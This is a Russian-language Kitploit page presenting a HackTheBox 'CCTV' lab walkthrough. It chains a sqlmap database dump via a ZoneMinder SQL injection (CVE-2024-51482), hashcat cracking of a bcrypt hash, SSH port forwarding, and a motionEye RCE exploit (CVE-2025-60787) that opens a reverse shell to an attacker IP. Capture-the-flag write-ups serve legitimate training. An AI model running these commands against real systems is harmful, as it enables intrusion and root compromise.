Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cctv — Прохождение HackTheBox CCTV с цепочкой эксплуатации CVE-2024-51482 (SQL-инъекция в ZoneMinder), взломом bcrypt-хэша и CVE-2025-60787 (RCE в motionEye) для получения root. | Kitploit
Инструменты/GitHubGitHub/ledksv/cctv
Взлом паролейПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubledksv/cctv

cctv

Прохождение HackTheBox CCTV с цепочкой эксплуатации CVE-2024-51482 (SQL-инъекция в ZoneMinder), взломом bcrypt-хэша и CVE-2025-60787 (RCE в motionEye) для получения root.

10 ч 51 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CCTV — Прохождение HackTheBox

Платформа: HackTheBox | ОС: Linux

Цепочка атаки

SQL-инъекция в ZoneMinder через CVE-2024-51482 извлекает bcrypt-хеш из базы данных. Взлом хеша с помощью hashcat даёт доступ по SSH. Внутренний экземпляр motionEye, доступный через перенаправление портов, уязвим к CVE-2025-60787 — это даёт root-оболочку.

Разведка

root@kitploit:~
nmap -sV -sC 10.129.53.160 -Pn

22/tcp open  ssh     OpenSSH 9.6p1 (Ubuntu)
80/tcp open  http    Apache 2.4.58 — SecureVision CCTV & Security Solutions

Добавил cctv.htb в /etc/hosts. На порту 80 размещалась установка ZoneMinder.

CVE-2024-51482 — SQL-инъекция в ZoneMinder

CVE-2024-51482 — это уязвимость SQL-инъекции в эндпоинте входа ZoneMinder. Параметр username не санитизируется, что позволяет извлечь базу данных.

root@kitploit:~
sqlmap -u "http://cctv.htb/zm/index.php" \
  --data="username=admin&password=admin&action=login" \
  --dbms=mysql --dump --batch

Извлёк bcrypt-хеш пароля из таблицы users.

Взлом хеша

root@kitploit:~
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

Пароль взломан.

Закрепление по SSH

root@kitploit:~
ssh <user>@10.129.53.160

Получен флаг пользователя. Проверил внутренние сервисы.

root@kitploit:~
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel

Перенаправил порт.

root@kitploit:~
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160

CVE-2025-60787 — RCE в motionEye

CVE-2025-60787 — это аутентифицированный RCE в motionEye. При наличии доступа к внутренней панели произвольные команды выполняются от имени root.

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444

Получена root-оболочка. Root-флаг находится в /root/root.txt.


Только в образовательных целях. Тестируйте только те системы, которыми владеете или на тестирование которых у вас есть явное разрешение.

Скачать инструмент